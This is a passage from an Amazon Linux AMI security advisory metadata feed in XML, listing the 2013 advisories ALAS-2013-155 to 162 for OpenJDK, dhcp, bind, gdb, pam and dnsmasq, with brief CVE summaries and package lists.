arch="x86_64"><filename>Packages/kernel-tools-3.2.37-2.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.37" release="2.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.37-2.47.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.2.37" release="2.47.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.37-2.47.amzn1.noarch.rpm</filename></package><package name="nvidia-kmod-3.2.37-2.47.amzn1" version="313.18" release="2012.09.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-kmod-3.2.37-2.47.amzn1-313.18-2012.09.0.amzn1.x86_64.rpm</filename></package><package name="nvidia" version="313.18" release="2012.09.0.amzn1" epoch="1" arch="x86_64"><filename>Packages/nvidia-313.18-2012.09.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-155</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-155: important priority package update for java-1.6.0-openjdk</title><issued date="2013-02-17 15:35:00" /><updated date="2014-09-15 22:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1478:
Multiple flaws were found in the way image parsers in the 2D and AWT components handled image raster parameters. A specially-crafted image could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the virtual machine privileges.
CVE-2013-0443:
It was discovered that the JSSE component did not properly validate Diffie-Hellman public keys. An SSL/TLS client could possibly use this flaw to perform a small subgroup attack.
CVE-2013-0442:
Multiple improper permission check issues were discovered in the AWT, CORBA, JMX, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-0440:
It was discovered that the SSL/TLS implementation in the JSSE component did not properly enforce handshake message ordering, allowing an unlimited number of handshake restarts. A remote attacker could use this flaw to make an SSL/TLS server using JSSE consume an excessive amount of CPU by continuously restarting the handshake.
CVE-2013-0435:
The default Java security properties configuration did not restrict access to certain com.sun.xml.internal packages. An untrusted Java application or applet could use this flaw to access information, bypassing certain Java sandbox restrictions. This update lists the whole package as restricted.
CVE-2013-0432:
A flaw was found in the AWT component's clipboard handling code. An untrusted Java application or applet could use this flaw to access clipboard data, bypassing Java sandbox restrictions.
CVE-2013-0427:
Multiple improper permission check issues were discovered in the Libraries, Networking, and JAXP components. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-0424:
It was discovered that the RMI component's CGIHandler class used user inputs in error messages without any sanitization. An attacker could use this flaw to perform a cross-site scripting (XSS) attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0424" title="" id="CVE-2013-0424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0427" title="" id="CVE-2013-0427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0432" title="" id="CVE-2013-0432" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0435" title="" id="CVE-2013-0435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0440" title="" id="CVE-2013-0440" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0442" title="" id="CVE-2013-0442" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0443" title="" id="CVE-2013-0443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1478" title="" id="CVE-2013-1478" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0245.html" title="" id="RHSA-2013:0245" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-54.1.11.6.48.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="54.1.11.6.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-54.1.11.6.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-156</id><title>Amazon Linux AMI 
2012.09 - ALAS-2013-156: important priority package update for java-1.7.0-openjdk</title><issued date="2013-02-17 15:35:00" /><updated date="2014-09-15 22:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1478:
Multiple flaws were found in the way image parsers in the 2D and AWT components handled image raster parameters. A specially-crafted image could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the virtual machine privileges.
CVE-2013-0443:
It was discovered that the JSSE component did not properly validate Diffie-Hellman public keys. An SSL/TLS client could possibly use this flaw to perform a small subgroup attack.
CVE-2013-0442:
Multiple improper permission check issues were discovered in the AWT, CORBA, JMX, Libraries, and Beans components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-0440:
It was discovered that the SSL/TLS implementation in the JSSE component did not properly enforce handshake message ordering, allowing an unlimited number of handshake restarts. A remote attacker could use this flaw to make an SSL/TLS server using JSSE consume an excessive amount of CPU by continuously restarting the handshake.
CVE-2013-0435:
The default Java security properties configuration did not restrict access to certain com.sun.xml.internal packages. An untrusted Java application or applet could use this flaw to access information, bypassing certain Java sandbox restrictions. This update lists the whole package as restricted.
CVE-2013-0432:
A flaw was found in the AWT component's clipboard handling code. An untrusted Java application or applet could use this flaw to access clipboard data, bypassing Java sandbox restrictions.
CVE-2013-0431:
Multiple improper permission check issues were discovered in the JMX, Libraries, Networking, and JAXP components. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2013-0424:
It was discovered that the RMI component's CGIHandler class used user inputs in error messages without any sanitization. An attacker could use this flaw to perform a cross-site scripting (XSS) attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0424" title="" id="CVE-2013-0424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431" title="" id="CVE-2013-0431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0432" title="" id="CVE-2013-0432" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0435" title="" id="CVE-2013-0435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0440" title="" id="CVE-2013-0440" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0442" title="" id="CVE-2013-0442" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0443" title="" id="CVE-2013-0443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1478" title="" id="CVE-2013-1478" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0247.html" title="" id="RHSA-2013:0247" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.5.3.17.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.17.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.5.3.17.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.5.3.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-157</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-157: low priority package update for dhcp</title><issued date="2013-03-02 16:47:00" /><updated date="2014-09-15 22:31:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2012-3955:
A flaw was found in the way the dhcpd daemon handled the expiration time of IPv6 leases. If dhcpd's configuration was changed to reduce the default IPv6 lease time, lease renewal requests for previously assigned leases could cause dhcpd to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3955" title="" id="CVE-2012-3955" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0504.html" title="" id="RHSA-2013:0504" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-common" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-34.P1.18.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="34.P1.18.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="34.P1.18.amzn1" epoch="12" 
arch="i686"><filename>Packages/dhcp-devel-4.1.1-34.P1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-158</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-158: medium priority package update for bind</title><issued date="2013-03-02 16:48:00" /><updated date="2014-09-15 22:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-5689:
A flaw was found in the DNS64 implementation in BIND when using Response Policy Zones (RPZ). If a remote attacker sent a specially-crafted query to a named server that is using RPZ rewrite rules, named could exit unexpectedly with an assertion failure. Note that DNS64 support is not enabled by default.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5689" title="" id="CVE-2012-5689" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0550.html" title="" id="RHSA-2013:0550" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.27.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" 
release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.27.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.17.rc1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-159</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-159: medium priority package update for gdb</title><issued date="2013-03-02 16:48:00" /><updated date="2014-09-15 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-4355:
GDB tried to auto-load certain files (such as GDB scripts, Python scripts, and a thread debugging library) from the current working directory when debugging programs. This could result in the execution of arbitrary code with the user's privileges when GDB was run in a directory that has untrusted content.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4355" title="" id="CVE-2011-4355" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0522.html" title="" id="RHSA-2013:0522" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gdb-debuginfo" version="7.2" release="60.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gdb-debuginfo-7.2-60.13.amzn1.x86_64.rpm</filename></package><package name="gdb-gdbserver" version="7.2" release="60.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gdb-gdbserver-7.2-60.13.amzn1.x86_64.rpm</filename></package><package name="gdb" version="7.2" release="60.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/gdb-7.2-60.13.amzn1.x86_64.rpm</filename></package><package name="gdb" version="7.2" release="60.13.amzn1" epoch="0" arch="i686"><filename>Packages/gdb-7.2-60.13.amzn1.i686.rpm</filename></package><package name="gdb-gdbserver" version="7.2" release="60.13.amzn1" epoch="0" arch="i686"><filename>Packages/gdb-gdbserver-7.2-60.13.amzn1.i686.rpm</filename></package><package name="gdb-debuginfo" version="7.2" release="60.13.amzn1" epoch="0" arch="i686"><filename>Packages/gdb-debuginfo-7.2-60.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-160</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-160: medium priority package update for pam</title><issued date="2013-03-02 16:48:00" /><updated date="2014-09-15 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-3149:
A denial of service flaw was found in the way the pam_env module expanded certain environment variables. If an application's PAM configuration contained "user_readenv=1" (this is not the default), a local attacker could use this flaw to cause the application to enter an infinite loop.
CVE-2011-3148:
A stack-based buffer overflow flaw was found in the way the pam_env module parsed users' "~/.pam_environment" files. If an application's PAM configuration contained "user_readenv=1" (this is not the default), a local attacker could use this flaw to crash the application or, possibly, escalate their privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3148" title="" id="CVE-2011-3148" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3149" title="" id="CVE-2011-3149" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0521.html" title="" id="RHSA-2013:0521" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam" version="1.1.1" release="13.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-1.1.1-13.20.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.1" release="13.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-debuginfo-1.1.1-13.20.amzn1.x86_64.rpm</filename></package><package name="pam-devel" version="1.1.1" release="13.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam-devel-1.1.1-13.20.amzn1.x86_64.rpm</filename></package><package name="pam-debuginfo" version="1.1.1" release="13.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam-debuginfo-1.1.1-13.20.amzn1.i686.rpm</filename></package><package name="pam" version="1.1.1" release="13.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam-1.1.1-13.20.amzn1.i686.rpm</filename></package><package name="pam-devel" version="1.1.1" release="13.20.amzn1" epoch="0" arch="i686"><filename>Packages/pam-devel-1.1.1-13.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-161</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-161: medium priority package update for dnsmasq</title><issued date="2013-03-02 16:49:00" /><updated date="2014-09-15 22:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-3411:
It was discovered that dnsmasq, when used in combination with certain libvirtd configurations, could incorrectly process network packets from network interfaces that were intended to be prohibited. A remote, unauthenticated attacker could exploit this flaw to cause a denial of service via DNS amplification attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3411" title="" id="CVE-2012-3411" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0277.html" title="" id="RHSA-2013:0277" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq" version="2.48" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.48-13.9.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-utils" version="2.48" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.48-13.9.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.48" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.48-13.9.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.48" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.48-13.9.amzn1.i686.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.48" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.48-13.9.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.48" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.48-13.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-162</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-162: important priority package update for java-1.7.0-openjdk</title><issued date="2013-03-02 16:49:00" /><updated date="2014-09-15 22:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1486:
Multiple improper permission check issues were discovered in the JMX and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1485:
An improper permission check issue was discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2013-0169:
It was discovered that OpenJDK leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1485" title="" id="CVE-2013-1485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1486" title="" id="CVE-2013-1486" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0275.html" title="" id="RHSA-2013:0275" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.7.1.20.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.7.1.20.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.7.1.20.amzn1" epoch="1" 
